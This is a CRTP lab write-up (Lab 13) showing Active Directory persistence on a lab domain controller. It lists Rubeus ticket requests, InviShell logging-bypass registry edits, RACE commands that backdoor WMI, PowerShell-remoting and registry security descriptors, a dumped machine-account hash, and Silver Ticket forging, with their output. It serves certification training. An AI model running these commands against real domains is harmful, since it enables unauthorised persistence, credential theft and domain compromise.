CRTP Lab 13
Task 1
Modify security descriptors on dcorp-dc to get access using PowerShell remoting and WMI without requiring administrator access.
Open elevated DA cmd:
#ArgSplit asktgt
#Open DA cmd:
C:\AD\Tools\Rubeus.exe asktgt /user:svcadmin /aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /pttAfter we get the shell as DA, run InviShell and import RACE
#InviShell
C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
#InviShell
C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
# Import RACE
. C:\AD\Tools\RACE.ps1Next, we try to provide student the same permissions as Builtin Administrator (BA) on root\cimv2 WMI namespace)
Set-RemoteWMI -SamAccountName student372 -ComputerName dcorp-dc -namespace 'root\cimv2' -VerboseWe have modified Security Descriptors and hence we can execute WMI queries as student without Administrative cmd.
gwmi -class win32_operatingsystem -ComputerName dcorp-dc
SystemDirectory : C:\Windows\system32
Organization :
BuildNumber : 20348
RegisteredUser : Windows User
SerialNumber : 00454-30000-00000-AA745
Version : 10.0.20348Task 2
Retrieve machine account hash from dcorp-dc without using administrator access and use that to execute a Silver Ticket attack to get code execution with WMI.
Before we retrieve machine account hash, we need to modify permissions on DC.
# Spawn a new Powershell.
powershell
. C:\AD\Tools\RACE.ps1
Add-RemoteRegBackdoor -ComputerName dcorp-dc.dollarcorp.moneycorp.local -Trustee student372 -Verbose
ComputerName BackdoorTrustee
------------ ---------------
dcorp-dc.dollarcorp.moneycorp.local student372Since student is added as backdoor, we can retrieve hash as student372.
# Spawn new powershell
. C:\AD\Tools\RACE.ps1
Get-RemoteMachineAccountHash -ComputerName dcorp-dc -Verbose
ComputerName MachineAccountHash
------------ ------------------
dcorp-dc 0a05dd30b8f44589c534dcd951c765b6Using the machine hash, we can use Silver Ticket attack on Host and RPCSS services.
# Host
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args %Pwn% /service:host/dcorp-dc.dollarcorp.moneycorp.local /rc4:0a05dd30b8f44589c534dcd951c765b6 /sid:S-1-5-21-719815819-3726368948-3917688648 /ldap /user:Administrator /domain:dollarcorp.moneycorp.local /ptt
# RPCSS
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args %Pwn% /service:rpcss/dcorp-dc.dollarcorp.moneycorp.local /rc4:0a05dd30b8f44589c534dcd951c765b6 /sid:S-1-5-21-719815819-3726368948-3917688648 /ldap /user:Administrator /domain:dollarcorp.moneycorp.local /pttPS Remoting:
PSRemoting:
C:\AD\Tools>C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
C:\AD\Tools>set COR_ENABLE_PROFILING=1
C:\AD\Tools>set COR_PROFILER={cf0d821e-299b-5307-a3d8-b283c03916db}
C:\AD\Tools>REG ADD "HKCU\Software\Classes\CLSID\{cf0d821e-299b-5307-a3d8-b283c03916db}" /f
The operation completed successfully.
C:\AD\Tools>REG ADD "HKCU\Software\Classes\CLSID\{cf0d821e-299b-5307-a3d8-b283c03916db}\InprocServer32" /f
The operation completed successfully.
C:\AD\Tools>REG ADD "HKCU\Software\Classes\CLSID\{cf0d821e-299b-5307-a3d8-b283c03916db}\InprocServer32" /ve /t REG_SZ /d "C:\AD\Tools\InviShell\InShellProf.dll" /f
The operation completed successfully.
C:\AD\Tools>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows
PS C:\AD\Tools> . C:\AD\Tools\RACE.ps1
PS C:\AD\Tools> Set-RemotePSRemoting -SamAccountName student372 -ComputerName dcorp-dc.dollarcorp.moneycorp.local -Verbose
[dcorp-dc.dollarcorp.moneycorp.local] Processing data from remote server dcorp-dc.dollarcorp.moneycorp.local failed
with the following error message: The I/O operation has been aborted because of either a thread exit or an application
request. For more information, see the about_Remote_Troubleshooting Help topic.
+ CategoryInfo : OpenError: (dcorp-dc.dollarcorp.moneycorp.local:String) [], PSRemotingTransportException
+ FullyQualifiedErrorId : WinRMOperationAborted,PSSessionStateBroken
PS C:\AD\Tools>Last updated